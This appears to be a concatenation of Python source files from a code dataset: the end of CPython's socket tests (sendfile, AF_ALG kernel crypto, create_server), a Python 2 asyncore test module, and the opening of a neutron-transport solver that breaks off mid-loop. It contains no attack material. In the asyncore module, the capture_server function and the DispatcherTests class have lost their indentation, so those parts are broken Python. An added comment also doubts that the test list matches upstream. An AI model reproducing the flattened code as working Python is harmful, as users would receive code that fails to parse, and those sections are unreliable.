        conn = self.accept_conn()
        data = self.recv_data(conn)
        self.assertEqual(len(data), self.FILESIZE)
        self.assertEqual(data, self.FILEDATA)

    # timeout (triggered)
    def _testWithTimeoutTriggeredSend(self):
        # A tiny timeout with a peer that barely reads must make the
        # send path raise socket.timeout.
        address = self.serv.getsockname()
        with open(support.TESTFN, 'rb') as file:
            with socket.create_connection(address) as sock:
                sock.settimeout(0.01)
                meth = self.meth_from_sock(sock)
                self.assertRaises(socket.timeout, meth, file)

    def testWithTimeoutTriggeredSend(self):
        conn = self.accept_conn()
        conn.recv(88192)

    # errors
    def _test_errors(self):
        pass

    def test_errors(self):
        # Argument validation: wrong socket type, text-mode file, and
        # invalid `count` values must raise before any data is sent.
        with open(support.TESTFN, 'rb') as file:
            with socket.socket(type=socket.SOCK_DGRAM) as s:
                meth = self.meth_from_sock(s)
                self.assertRaisesRegex(
                    ValueError, "SOCK_STREAM", meth, file)
        with open(support.TESTFN, 'rt') as file:
            with socket.socket() as s:
                meth = self.meth_from_sock(s)
                self.assertRaisesRegex(
                    ValueError, "binary mode", meth, file)
        with open(support.TESTFN, 'rb') as file:
            with socket.socket() as s:
                meth = self.meth_from_sock(s)
                self.assertRaisesRegex(TypeError, "positive integer",
                                       meth, file, count='2')
                self.assertRaisesRegex(TypeError, "positive integer",
                                       meth, file, count=0.1)
                self.assertRaisesRegex(ValueError, "positive integer",
                                       meth, file, count=0)
                self.assertRaisesRegex(ValueError, "positive integer",
                                       meth, file, count=-1)
@unittest.skipUnless(hasattr(os, "sendfile"),
                     'os.sendfile() required for this test.')
class SendfileUsingSendfileTest(SendfileUsingSendTest):
    """
    Test the sendfile() implementation of socket.sendfile().

    Reuses every test from SendfileUsingSendTest, but routes them
    through the os.sendfile()-based code path instead of send().
    """
    def meth_from_sock(self, sock):
        # Select the zero-copy sendfile() implementation.
        return sock._sendfile_use_sendfile
@unittest.skipUnless(HAVE_SOCKET_ALG, 'AF_ALG required')
class LinuxKernelCryptoAPI(unittest.TestCase):
    # tests for AF_ALG
    def create_alg(self, typ, name):
        # Bind an AF_ALG socket to (type, algorithm); skip the test if
        # the kernel doesn't provide the algorithm.
        sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
        try:
            sock.bind((typ, name))
        except FileNotFoundError as e:
            # type / algorithm is not available
            sock.close()
            raise unittest.SkipTest(str(e), typ, name)
        else:
            return sock

    # bpo-31705: On kernel older than 4.5, sendto() failed with ENOKEY,
    # at least on ppc64le architecture
    @support.requires_linux_version(4, 5)
    def test_sha256(self):
        expected = bytes.fromhex("ba7816bf8f01cfea414140de5dae2223b00361a396"
                                 "177a9cb410ff61f20015ad")
        with self.create_alg('hash', 'sha256') as algo:
            op, _ = algo.accept()
            with op:
                op.sendall(b"abc")
                self.assertEqual(op.recv(512), expected)

            # Same digest, fed one byte at a time with MSG_MORE.
            op, _ = algo.accept()
            with op:
                op.send(b'a', socket.MSG_MORE)
                op.send(b'b', socket.MSG_MORE)
                op.send(b'c', socket.MSG_MORE)
                op.send(b'')
                self.assertEqual(op.recv(512), expected)

    def test_hmac_sha1(self):
        # RFC 2202 test vector 2 for HMAC-SHA1 (key b"Jefe").
        expected = bytes.fromhex("effcdf6ae5eb2fa2d27416d5f184df9c259a7c79")
        with self.create_alg('hash', 'hmac(sha1)') as algo:
            algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, b"Jefe")
            op, _ = algo.accept()
            with op:
                op.sendall(b"what do ya want for nothing?")
                self.assertEqual(op.recv(512), expected)

    # Although it should work with 3.19 and newer the test blocks on
    # Ubuntu 15.10 with Kernel 4.2.0-19.
    @support.requires_linux_version(4, 3)
    def test_aes_cbc(self):
        key = bytes.fromhex('06a9214036b8a15b512e03d534120006')
        iv = bytes.fromhex('3dafba429d9eb430b422da802c9fac41')
        msg = b"Single block msg"
        ciphertext = bytes.fromhex('e353779c1079aeb82708942dbe77181a')
        msglen = len(msg)
        with self.create_alg('skcipher', 'cbc(aes)') as algo:
            algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
            # Encrypt: op/iv via ancillary data, payload streamed after.
            op, _ = algo.accept()
            with op:
                op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
                                 flags=socket.MSG_MORE)
                op.sendall(msg)
                self.assertEqual(op.recv(msglen), ciphertext)

            # Decrypt back to the plaintext.
            op, _ = algo.accept()
            with op:
                op.sendmsg_afalg([ciphertext],
                                 op=socket.ALG_OP_DECRYPT, iv=iv)
                self.assertEqual(op.recv(msglen), msg)

            # long message
            multiplier = 1024
            longmsg = [msg] * multiplier
            op, _ = algo.accept()
            with op:
                op.sendmsg_afalg(longmsg,
                                 op=socket.ALG_OP_ENCRYPT, iv=iv)
                enc = op.recv(msglen * multiplier)
            self.assertEqual(len(enc), msglen * multiplier)
            self.assertEqual(enc[:msglen], ciphertext)

            op, _ = algo.accept()
            with op:
                op.sendmsg_afalg([enc],
                                 op=socket.ALG_OP_DECRYPT, iv=iv)
                dec = op.recv(msglen * multiplier)
            self.assertEqual(len(dec), msglen * multiplier)
            self.assertEqual(dec, msg * multiplier)

    @support.requires_linux_version(4, 9)  # see issue29324
    def test_aead_aes_gcm(self):
        key = bytes.fromhex('c939cc13397c1d37de6ae0e1cb7c423c')
        iv = bytes.fromhex('b3d8cc017cbb89b39e0f67e2')
        plain = bytes.fromhex('c3b3c41f113a31b73d9a5cd432103069')
        assoc = bytes.fromhex('24825602bd12a984e0092d3e448eda5f')
        expected_ct = bytes.fromhex('93fe7d9e9bfd10348a5606e5cafa7354')
        expected_tag = bytes.fromhex('0032a1dc85f1c9786925a2e71d8272dd')

        taglen = len(expected_tag)
        assoclen = len(assoc)

        with self.create_alg('aead', 'gcm(aes)') as algo:
            algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
            algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_AEAD_AUTHSIZE,
                            None, taglen)

            # send assoc, plain and tag buffer in separate steps
            op, _ = algo.accept()
            with op:
                op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
                                 assoclen=assoclen, flags=socket.MSG_MORE)
                op.sendall(assoc, socket.MSG_MORE)
                op.sendall(plain)
                res = op.recv(assoclen + len(plain) + taglen)
                self.assertEqual(expected_ct, res[assoclen:-taglen])
                self.assertEqual(expected_tag, res[-taglen:])

            # now with msg
            op, _ = algo.accept()
            with op:
                msg = assoc + plain
                op.sendmsg_afalg([msg], op=socket.ALG_OP_ENCRYPT, iv=iv,
                                 assoclen=assoclen)
                res = op.recv(assoclen + len(plain) + taglen)
                self.assertEqual(expected_ct, res[assoclen:-taglen])
                self.assertEqual(expected_tag, res[-taglen:])

            # create anc data manually
            pack_uint32 = struct.Struct('I').pack
            op, _ = algo.accept()
            with op:
                msg = assoc + plain
                op.sendmsg(
                    [msg],
                    ([socket.SOL_ALG, socket.ALG_SET_OP, pack_uint32(socket.ALG_OP_ENCRYPT)],
                     [socket.SOL_ALG, socket.ALG_SET_IV, pack_uint32(len(iv)) + iv],
                     [socket.SOL_ALG, socket.ALG_SET_AEAD_ASSOCLEN, pack_uint32(assoclen)],
                    )
                )
                res = op.recv(len(msg) + taglen)
                self.assertEqual(expected_ct, res[assoclen:-taglen])
                self.assertEqual(expected_tag, res[-taglen:])

            # decrypt and verify
            op, _ = algo.accept()
            with op:
                msg = assoc + expected_ct + expected_tag
                op.sendmsg_afalg([msg], op=socket.ALG_OP_DECRYPT, iv=iv,
                                 assoclen=assoclen)
                res = op.recv(len(msg) - taglen)
                self.assertEqual(plain, res[assoclen:])

    @support.requires_linux_version(4, 3)  # see test_aes_cbc
    def test_drbg_pr_sha256(self):
        # deterministic random bit generator, prediction resistance, sha256
        with self.create_alg('rng', 'drbg_pr_sha256') as algo:
            extra_seed = os.urandom(32)
            algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, extra_seed)
            op, _ = algo.accept()
            with op:
                rn = op.recv(32)
                self.assertEqual(len(rn), 32)

    def test_sendmsg_afalg_args(self):
        # Argument validation for sendmsg_afalg().
        sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
        with sock:
            with self.assertRaises(TypeError):
                sock.sendmsg_afalg()

            with self.assertRaises(TypeError):
                sock.sendmsg_afalg(op=None)

            with self.assertRaises(TypeError):
                sock.sendmsg_afalg(1)

            with self.assertRaises(TypeError):
                sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=None)

            with self.assertRaises(TypeError):
                sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=-1)

    def test_length_restriction(self):
        # bpo-35050, off-by-one error in length check
        sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
        self.addCleanup(sock.close)

        # salg_type[14]
        with self.assertRaises(FileNotFoundError):
            sock.bind(("t" * 13, "name"))
        with self.assertRaisesRegex(ValueError, "type too long"):
            sock.bind(("t" * 14, "name"))

        # salg_name[64]
        with self.assertRaises(FileNotFoundError):
            sock.bind(("type", "n" * 63))
        with self.assertRaisesRegex(ValueError, "name too long"):
            sock.bind(("type", "n" * 64))
@unittest.skipUnless(sys.platform.startswith("win"), "requires Windows")
class TestMSWindowsTCPFlags(unittest.TestCase):
    """Detect TCP_* options newly exposed by the Windows build.

    When a new flag shows up in the socket module it should be reviewed
    and added to the known set below.
    """

    knownTCPFlags = {
        # available since long time ago
        'TCP_MAXSEG',
        'TCP_NODELAY',
        # available starting with Windows 10 1607
        'TCP_FASTOPEN',
        # available starting with Windows 10 1703
        'TCP_KEEPCNT',
        # available starting with Windows 10 1709
        'TCP_KEEPIDLE',
        'TCP_KEEPINTVL'
        }

    def test_new_tcp_flags(self):
        # Every TCP_* name exposed by the socket module must already be
        # in the reviewed set above.
        exported = (name for name in dir(socket) if name.startswith('TCP'))
        unexpected = [name for name in exported
                      if name not in self.knownTCPFlags]
        self.assertEqual([], unexpected,
                         "New TCP flags were discovered. See bpo-32394 for more information")
class CreateServerTest(unittest.TestCase):
    """Tests for the socket.create_server() convenience function."""

    def test_address(self):
        # The bound address/port must match what was requested.
        port = support.find_unused_port()
        with socket.create_server(("127.0.0.1", port)) as sock:
            self.assertEqual(sock.getsockname()[0], "127.0.0.1")
            self.assertEqual(sock.getsockname()[1], port)
        if support.IPV6_ENABLED:
            with socket.create_server(("::1", port),
                                      family=socket.AF_INET6) as sock:
                self.assertEqual(sock.getsockname()[0], "::1")
                self.assertEqual(sock.getsockname()[1], port)

    def test_family_and_type(self):
        with socket.create_server(("127.0.0.1", 0)) as sock:
            self.assertEqual(sock.family, socket.AF_INET)
            self.assertEqual(sock.type, socket.SOCK_STREAM)
        if support.IPV6_ENABLED:
            with socket.create_server(("::1", 0), family=socket.AF_INET6) as s:
                self.assertEqual(s.family, socket.AF_INET6)
                # Bug fix: this previously asserted on `sock` (the closed
                # IPv4 socket from the block above), so the IPv6 socket's
                # type was never actually checked.
                self.assertEqual(s.type, socket.SOCK_STREAM)

    def test_reuse_port(self):
        if not hasattr(socket, "SO_REUSEPORT"):
            # Requesting reuse_port on platforms without SO_REUSEPORT
            # must fail loudly.
            with self.assertRaises(ValueError):
                socket.create_server(("localhost", 0), reuse_port=True)
        else:
            with socket.create_server(("localhost", 0)) as sock:
                opt = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT)
                self.assertEqual(opt, 0)
            with socket.create_server(("localhost", 0), reuse_port=True) as sock:
                opt = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT)
                self.assertNotEqual(opt, 0)

    @unittest.skipIf(not hasattr(_socket, 'IPPROTO_IPV6') or
                     not hasattr(_socket, 'IPV6_V6ONLY'),
                     "IPV6_V6ONLY option not supported")
    @unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
    def test_ipv6_only_default(self):
        # Without dualstack_ipv6, an AF_INET6 server is v6-only.
        with socket.create_server(("::1", 0), family=socket.AF_INET6) as sock:
            assert sock.getsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY)

    @unittest.skipIf(not socket.has_dualstack_ipv6(),
                     "dualstack_ipv6 not supported")
    @unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
    def test_dualstack_ipv6_family(self):
        with socket.create_server(("::1", 0), family=socket.AF_INET6,
                                  dualstack_ipv6=True) as sock:
            self.assertEqual(sock.family, socket.AF_INET6)
class CreateServerFunctionalTest(unittest.TestCase):
    # End-to-end echo tests for socket.create_server(), including
    # IPv4-mapped clients against a dual-stack IPv6 server.
    timeout = 3

    def setUp(self):
        self.thread = None

    def tearDown(self):
        if self.thread is not None:
            self.thread.join(self.timeout)

    def echo_server(self, sock):
        # Serve exactly one connection in a background thread, echoing
        # one payload back; `event` gates the server until started.
        def run(sock):
            with sock:
                conn, _ = sock.accept()
                with conn:
                    event.wait(self.timeout)
                    msg = conn.recv(1024)
                    if not msg:
                        return
                    conn.sendall(msg)

        event = threading.Event()
        sock.settimeout(self.timeout)
        self.thread = threading.Thread(target=run, args=(sock, ))
        self.thread.start()
        event.set()

    def echo_client(self, addr, family):
        with socket.socket(family=family) as sock:
            sock.settimeout(self.timeout)
            sock.connect(addr)
            sock.sendall(b'foo')
            self.assertEqual(sock.recv(1024), b'foo')

    def test_tcp4(self):
        port = support.find_unused_port()
        with socket.create_server(("", port)) as sock:
            self.echo_server(sock)
            self.echo_client(("127.0.0.1", port), socket.AF_INET)

    @unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
    def test_tcp6(self):
        port = support.find_unused_port()
        with socket.create_server(("", port),
                                  family=socket.AF_INET6) as sock:
            self.echo_server(sock)
            self.echo_client(("::1", port), socket.AF_INET6)

    # --- dual stack tests

    @unittest.skipIf(not socket.has_dualstack_ipv6(),
                     "dualstack_ipv6 not supported")
    @unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
    def test_dual_stack_client_v4(self):
        # An IPv4 client must be able to reach a dual-stack IPv6 server.
        port = support.find_unused_port()
        with socket.create_server(("", port), family=socket.AF_INET6,
                                  dualstack_ipv6=True) as sock:
            self.echo_server(sock)
            self.echo_client(("127.0.0.1", port), socket.AF_INET)

    @unittest.skipIf(not socket.has_dualstack_ipv6(),
                     "dualstack_ipv6 not supported")
    @unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
    def test_dual_stack_client_v6(self):
        port = support.find_unused_port()
        with socket.create_server(("", port), family=socket.AF_INET6,
                                  dualstack_ipv6=True) as sock:
            self.echo_server(sock)
            self.echo_client(("::1", port), socket.AF_INET6)
def test_main():
    # Assemble the full list of test classes and run them with
    # threading bookkeeping around the run.
    # NOTE(review): in upstream CPython several of these extends are
    # conditional on platform support; here they appear unconditional —
    # confirm against the original file before relying on this list.
    tests = [GeneralModuleTests, BasicTCPTest, TCPCloserTest, TCPTimeoutTest,
             TestExceptions, BufferIOTest, BasicTCPTest2, BasicUDPTest,
             UDPTimeoutTest, CreateServerTest, CreateServerFunctionalTest]

    tests.extend([
        NonBlockingTCPTests,
        FileObjectClassTestCase,
        UnbufferedFileObjectClassTestCase,
        LineBufferedFileObjectClassTestCase,
        SmallBufferedFileObjectClassTestCase,
        UnicodeReadFileObjectClassTestCase,
        UnicodeWriteFileObjectClassTestCase,
        UnicodeReadWriteFileObjectClassTestCase,
        NetworkConnectionNoServer,
        NetworkConnectionAttributesTest,
        NetworkConnectionBehaviourTest,
        ContextManagersTest,
        InheritanceTest,
        NonblockConstantTest
    ])
    tests.append(BasicSocketPairTest)
    tests.append(TestUnixDomain)
    tests.append(TestLinuxAbstractNamespace)
    tests.extend([TIPCTest, TIPCThreadableTest])
    tests.extend([BasicCANTest, CANTest])
    tests.extend([BasicRDSTest, RDSTest])
    tests.append(LinuxKernelCryptoAPI)
    tests.append(BasicQIPCRTRTest)
    tests.extend([
        BasicVSOCKTest,
        ThreadedVSOCKSocketStreamTest,
    ])
    tests.extend([
        CmsgMacroTests,
        SendmsgUDPTest,
        RecvmsgUDPTest,
        RecvmsgIntoUDPTest,
        SendmsgUDP6Test,
        RecvmsgUDP6Test,
        RecvmsgRFC3542AncillaryUDP6Test,
        RecvmsgIntoRFC3542AncillaryUDP6Test,
        RecvmsgIntoUDP6Test,
        SendmsgTCPTest,
        RecvmsgTCPTest,
        RecvmsgIntoTCPTest,
        SendmsgSCTPStreamTest,
        RecvmsgSCTPStreamTest,
        RecvmsgIntoSCTPStreamTest,
        SendmsgUnixStreamTest,
        RecvmsgUnixStreamTest,
        RecvmsgIntoUnixStreamTest,
        RecvmsgSCMRightsStreamTest,
        RecvmsgIntoSCMRightsStreamTest,
        # These are slow when setitimer() is not available
        InterruptedRecvTimeoutTest,
        InterruptedSendTimeoutTest,
        TestSocketSharing,
        SendfileUsingSendTest,
        SendfileUsingSendfileTest,
    ])
    tests.append(TestMSWindowsTCPFlags)

    thread_info = support.threading_setup()
    support.run_unittest(*tests)
    # Verify no threads leaked by the test run.
    support.threading_cleanup(*thread_info)
# Allow running this test file directly as a script.
if __name__ == "__main__":
    test_main()
|
test_asyncore.py | import asyncore
import unittest
import select
import os
import socket
import threading
import sys
import time
import errno
from test import test_support
from test.test_support import TESTFN, run_unittest, unlink
from StringIO import StringIO
HOST = test_support.HOST
class dummysocket:
    """Minimal socket stand-in that records whether close() was called."""

    def __init__(self):
        # Flipped to True by close(); inspected by the tests.
        self.closed = False

    def fileno(self):
        # Arbitrary fixed descriptor number for the asyncore map.
        return 42

    def close(self):
        self.closed = True
class dummychannel:
    # Channel stand-in wrapping a dummysocket; close() forwards to it.
    def __init__(self):
        self.socket = dummysocket()

    def close(self):
        self.socket.close()
class exitingdummy:
    # Dispatcher stand-in whose every event handler raises
    # asyncore.ExitNow, used to check that ExitNow propagates.
    def __init__(self):
        pass

    def handle_read_event(self):
        raise asyncore.ExitNow()

    # All event entry points share the same raising handler.
    handle_write_event = handle_read_event
    handle_close = handle_read_event
    handle_expt_event = handle_read_event
class crashingdummy:
    # Dispatcher stand-in whose event handlers raise a generic
    # Exception; asyncore should route it to handle_error().
    def __init__(self):
        self.error_handled = False

    def handle_read_event(self):
        raise Exception()

    # All event entry points share the same raising handler.
    handle_write_event = handle_read_event
    handle_close = handle_read_event
    handle_expt_event = handle_read_event

    def handle_error(self):
        # Record that asyncore invoked the error hook.
        self.error_handled = True
# used when testing senders; just collects what it gets until newline is sent
def capture_server(evt, buf, serv):
try:
serv.listen(5)
conn, addr = serv.accept()
except socket.timeout:
pass
else:
n = 200
while n > 0:
r, w, e = select.select([conn], [], [])
if r:
data = conn.recv(10)
# keep everything except for the newline terminator
buf.write(data.replace('\n', ''))
if '\n' in data:
break
n -= 1
time.sleep(0.01)
conn.close()
finally:
serv.close()
evt.set()
class HelperFunctionTests(unittest.TestCase):
    """Tests for asyncore's module-level helpers: read/write/_exception,
    readwrite, close_all and compact_traceback."""

    def test_readwriteexc(self):
        # Check exception handling behavior of read, write and _exception

        # check that ExitNow exceptions in the object handler method
        # bubbles all the way up through asyncore read/write/_exception calls
        tr1 = exitingdummy()
        self.assertRaises(asyncore.ExitNow, asyncore.read, tr1)
        self.assertRaises(asyncore.ExitNow, asyncore.write, tr1)
        self.assertRaises(asyncore.ExitNow, asyncore._exception, tr1)

        # check that an exception other than ExitNow in the object handler
        # method causes the handle_error method to get called
        tr2 = crashingdummy()
        asyncore.read(tr2)
        self.assertEqual(tr2.error_handled, True)

        tr2 = crashingdummy()
        asyncore.write(tr2)
        self.assertEqual(tr2.error_handled, True)

        tr2 = crashingdummy()
        asyncore._exception(tr2)
        self.assertEqual(tr2.error_handled, True)

    # asyncore.readwrite uses constants in the select module that
    # are not present in Windows systems (see this thread:
    # http://mail.python.org/pipermail/python-list/2001-October/109973.html)
    # These constants should be present as long as poll is available
    if hasattr(select, 'poll'):
        def test_readwrite(self):
            # Check that correct methods are called by readwrite()

            attributes = ('read', 'expt', 'write', 'closed', 'error_handled')

            # each poll flag should trigger exactly one handler
            expected = (
                (select.POLLIN, 'read'),
                (select.POLLPRI, 'expt'),
                (select.POLLOUT, 'write'),
                (select.POLLERR, 'closed'),
                (select.POLLHUP, 'closed'),
                (select.POLLNVAL, 'closed'),
            )

            class testobj:
                # records which handler fired via boolean flags
                def __init__(self):
                    self.read = False
                    self.write = False
                    self.closed = False
                    self.expt = False
                    self.error_handled = False

                def handle_read_event(self):
                    self.read = True

                def handle_write_event(self):
                    self.write = True

                def handle_close(self):
                    self.closed = True

                def handle_expt_event(self):
                    self.expt = True

                def handle_error(self):
                    self.error_handled = True

            for flag, expectedattr in expected:
                tobj = testobj()
                self.assertEqual(getattr(tobj, expectedattr), False)
                asyncore.readwrite(tobj, flag)

                # Only the attribute modified by the routine we expect to be
                # called should be True.
                for attr in attributes:
                    self.assertEqual(getattr(tobj, attr), attr==expectedattr)

                # check that ExitNow exceptions in the object handler method
                # bubbles all the way up through asyncore readwrite call
                tr1 = exitingdummy()
                self.assertRaises(asyncore.ExitNow, asyncore.readwrite, tr1, flag)

                # check that an exception other than ExitNow in the object handler
                # method causes the handle_error method to get called
                tr2 = crashingdummy()
                self.assertEqual(tr2.error_handled, False)
                asyncore.readwrite(tr2, flag)
                self.assertEqual(tr2.error_handled, True)

    def test_closeall(self):
        self.closeall_check(False)

    def test_closeall_default(self):
        self.closeall_check(True)

    def closeall_check(self, usedefault):
        # Check that close_all() closes everything in a given map
        l = []
        testmap = {}
        for i in range(10):
            c = dummychannel()
            l.append(c)
            self.assertEqual(c.socket.closed, False)
            testmap[i] = c

        if usedefault:
            # temporarily swap in our map as the module-global socket_map
            socketmap = asyncore.socket_map
            try:
                asyncore.socket_map = testmap
                asyncore.close_all()
            finally:
                testmap, asyncore.socket_map = asyncore.socket_map, socketmap
        else:
            asyncore.close_all(testmap)

        # close_all must empty the map and close every channel's socket
        self.assertEqual(len(testmap), 0)
        for c in l:
            self.assertEqual(c.socket.closed, True)

    def test_compact_traceback(self):
        try:
            raise Exception("I don't like spam!")
        except:
            real_t, real_v, real_tb = sys.exc_info()
            r = asyncore.compact_traceback()
        else:
            self.fail("Expected exception")

        # compact_traceback returns ((file, function, line), type, value, info)
        (f, function, line), t, v, info = r
        self.assertEqual(os.path.split(f)[-1], 'test_asyncore.py')
        self.assertEqual(function, 'test_compact_traceback')
        self.assertEqual(t, real_t)
        self.assertEqual(v, real_v)
        self.assertEqual(info, '[%s|%s|%s]' % (f, function, line))
class DispatcherTests(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
asyncore.close_all()
def test_basic(self):
d = asyncore.dispatcher()
self.assertEqual(d.readable(), True)
self.assertEqual(d.writable(), True)
def test_repr(self):
d = asyncore.dispatcher()
self.assertEqual(repr(d), '<asyncore.dispatcher at %#x>' % id(d))
def test_log(self):
d = asyncore.dispatcher()
# capture output of dispatcher.log() (to stderr)
fp = StringIO()
stderr = sys.stderr
l1 = "Lovely spam! Wonderful spam!"
l2 = "I don't like spam!"
try:
sys.stderr = fp
d.log(l1)
d.log(l2)
finally:
sys.stderr = stderr
lines = fp.getvalue().splitlines()
self.assertEquals(lines, ['log: %s' % l1, 'log: %s' % l2])
def test_log_info(self):
d = asyncore.dispatcher()
# capture output of dispatcher.log_info() (to stdout via print)
fp = StringIO()
stdout = sys.stdout
l1 = "Have you got anything without spam?"
l2 = "Why can't she have egg bacon spam and sausage?"
l3 = "THAT'S got spam in it!"
try:
sys.stdout = fp
d.log_info(l1, 'EGGS')
d.log_info(l2)
d.log_info(l3, 'SPAM')
finally:
sys.stdout = stdout
lines = fp.getvalue().splitlines()
expected = ['EGGS: %s' % l1, 'info: %s' % l2, 'SPAM: %s' % l3]
self.assertEquals(lines, expected)
def test_unhandled(self):
d = asyncore.dispatcher()
d.ignore_log_types = ()
# capture output of dispatcher.log_info() (to stdout via print)
fp = StringIO()
stdout = sys.stdout
try:
sys.stdout = fp
d.handle_expt()
d.handle_read()
d.handle_write()
d.handle_connect()
d.handle_accept()
finally:
sys.stdout = stdout
lines = fp.getvalue().splitlines()
expected = ['warning: unhandled incoming priority event',
'warning: unhandled read event',
'warning: unhandled write event',
'warning: unhandled connect event',
'warning: unhandled accept event']
self.assertEquals(lines, expected)
def test_issue_8594(self):
d = asyncore.dispatcher(socket.socket())
# make sure the error message no longer refers to the socket
# object but the dispatcher instance instead
try:
d.foo
except AttributeError, err:
self.assertTrue('dispatcher instance' in str(err))
else:
self.fail("exception not raised")
# test cheap inheritance with the underlying socket
self.assertEqual(d.family, socket.AF_INET)
def test_strerror(self):
# refers to bug #8573
err = asyncore._strerror(errno.EPERM)
if hasattr(os, 'strerror'):
self.assertEqual(err, os.strerror(errno.EPERM))
err = asyncore._strerror(-1)
self.assertTrue("unknown error" in err.lower())
class dispatcherwithsend_noread(asyncore.dispatcher_with_send):
    """dispatcher_with_send variant that never reads and ignores connect."""

    def handle_connect(self):
        # nothing to do once connected; send() drives everything
        pass

    def readable(self):
        # never ask the loop for read events
        return False
class DispatcherWithSendTests(unittest.TestCase):
    """End-to-end check that dispatcher_with_send delivers buffered data
    to a real TCP server running in a background thread."""

    # subclass flips this to exercise the poll()-based loop
    usepoll = False

    def setUp(self):
        pass

    def tearDown(self):
        asyncore.close_all()

    def test_send(self):
        self.evt = threading.Event()
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.settimeout(3)
        self.port = test_support.bind_port(self.sock)

        # server thread appends received bytes (minus '\n') into cap
        cap = StringIO()
        args = (self.evt, cap, self.sock)
        threading.Thread(target=capture_server, args=args).start()

        # wait a little longer for the server to initialize (it sometimes
        # refuses connections on slow machines without this wait)
        time.sleep(0.2)

        data = "Suppose there isn't a 16-ton weight?"
        d = dispatcherwithsend_noread()
        d.create_socket(socket.AF_INET, socket.SOCK_STREAM)
        d.connect((HOST, self.port))

        # give time for socket to connect
        time.sleep(0.1)

        # two payloads plus the newline terminator the server waits for
        d.send(data)
        d.send(data)
        d.send('\n')

        # pump the event loop until the out buffer drains (bounded)
        n = 1000
        while d.out_buffer and n > 0:
            asyncore.poll()
            n -= 1

        self.evt.wait()

        self.assertEqual(cap.getvalue(), data*2)
class DispatcherWithSendTests_UsePoll(DispatcherWithSendTests):
    # re-run the send tests with the poll()-based loop instead of select()
    usepoll = True
# file_wrapper/file_dispatcher are only available on platforms with dup()
if hasattr(asyncore, 'file_wrapper'):
    class FileWrapperTest(unittest.TestCase):
        """Tests for asyncore.file_wrapper / file_dispatcher over a temp file."""

        def setUp(self):
            self.d = "It's not dead, it's sleeping!"
            file(TESTFN, 'w').write(self.d)

        def tearDown(self):
            unlink(TESTFN)

        def test_recv(self):
            fd = os.open(TESTFN, os.O_RDONLY)
            w = asyncore.file_wrapper(fd)
            # wrapper dup()s the descriptor, so closing ours is safe
            os.close(fd)

            self.assertNotEqual(w.fd, fd)
            self.assertNotEqual(w.fileno(), fd)
            self.assertEqual(w.recv(13), "It's not dead")
            self.assertEqual(w.read(6), ", it's")
            w.close()
            # reading a closed wrapper must fail
            self.assertRaises(OSError, w.read, 1)

        def test_send(self):
            d1 = "Come again?"
            d2 = "I want to buy some cheese."
            fd = os.open(TESTFN, os.O_WRONLY | os.O_APPEND)
            w = asyncore.file_wrapper(fd)
            os.close(fd)

            # write() and send() are aliases; both must append
            w.write(d1)
            w.send(d2)
            w.close()
            self.assertEqual(file(TESTFN).read(), self.d + d1 + d2)

        def test_dispatcher(self):
            fd = os.open(TESTFN, os.O_RDONLY)
            data = []
            class FileDispatcher(asyncore.file_dispatcher):
                def handle_read(self):
                    data.append(self.recv(29))
            s = FileDispatcher(fd)
            os.close(fd)
            # two loop passes are enough to drain the 29-byte file
            asyncore.loop(timeout=0.01, use_poll=True, count=2)
            self.assertEqual("".join(data), self.d)
def test_main():
    """Run every test case; FileWrapperTest only where supported."""
    suite = [
        HelperFunctionTests,
        DispatcherTests,
        DispatcherWithSendTests,
        DispatcherWithSendTests_UsePoll,
    ]
    # file_wrapper is platform-dependent (absent e.g. on Windows)
    if hasattr(asyncore, 'file_wrapper'):
        suite.append(FileWrapperTest)
    run_unittest(*suite)


if __name__ == "__main__":
    test_main()
|
solver.py | # -*- coding: utf-8 -*-
"""
Created on Wed Nov 20 11:09:46 2019
@author: azmanrafee
"""
def sweepbyangle(energy_group,X0, XN, omega_j, Q_mp, Sigma_trans, omega_azim, NN, delx, sintheta_j,j, group_mp, angles, phi_j_mp, a, b, phi_mpp, on, active):
    """Worker-process loop: transport sweep over this worker's share of
    azimuthal angles for the energy group currently stored in group_mp.

    Runs until ``on.value`` is cleared.  Each pass is triggered by the
    parent setting ``active.value``; results are published through the
    shared arrays ``phi_mpp`` (scalar-flux contribution) and
    ``phi_j_mp[a*2*j:b*2*j]`` (boundary angular fluxes), after which
    ``active.value`` is reset to signal completion.
    NOTE(review): plain RawValue flags with busy polling, no locks —
    assumes a single producer (the parent process); confirm.
    """
    import math, numpy as np
    # per-worker scratch: angular flux per (group, angle, polar index),
    # boundary angular flux per (side, angle, polar), scalar-flux buffer
    phi_j=np.zeros((energy_group,len(angles),j),dtype='d')
    phi_j_boun=np.zeros((2,len(angles),j),dtype='d')
    phi=np.zeros(NN,dtype='d')
    Q=np.zeros(np.shape(Sigma_trans),dtype='d')
    while on.value:
        if active.value:
            phi*=0
            # refresh the shared source and the group index for this pass
            Q[:]=np.asarray(Q_mp).reshape(np.shape(Sigma_trans))
            group=group_mp.value
            for angle in range(len(angles)):
                position=0
                reverse=False
                while True:
                    for jj in range(j):
                        # characteristic segment length in this direction
                        s=delx[position]/sintheta_j[jj]/math.cos(angles[angle])
